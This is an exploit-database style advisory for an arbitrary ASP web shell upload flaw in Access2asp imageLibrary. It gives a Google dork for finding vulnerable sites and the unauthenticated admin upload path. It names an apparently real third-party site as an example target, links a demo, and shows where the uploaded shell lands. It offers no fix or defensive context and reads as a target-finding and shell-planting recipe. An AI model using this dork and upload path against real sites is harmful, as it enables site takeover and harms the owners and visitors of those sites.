id: 4900
date: 03/02/2009
title: Access2asp imageLibrary Arbitrary ASP Shell Upload Vulnerability
author: mr.al7rbi
cves: 

================================================================
Access2asp imageLibrary Arbitrary ASP Shell Upload Vulnerability
================================================================


[+] Title: imageLibrary


[dork]

inurl:"default_Image.asp"

[+] EXPLOITS:

http://www.site.com/imageLibrary//admin/images/default_Image.asp

[exp:]  

http://www.davidhalpernmd.com/manage_tbps/default_Image.asp

[demo]

]http://www.access2asp.com/imageLibraryDemo/admin/images/default_Image.asp

[shell be like ]

http://www.access2asp.com/imageLibraryDemo/admin/images/win.asp



#  0day.today [2023-03-24]  #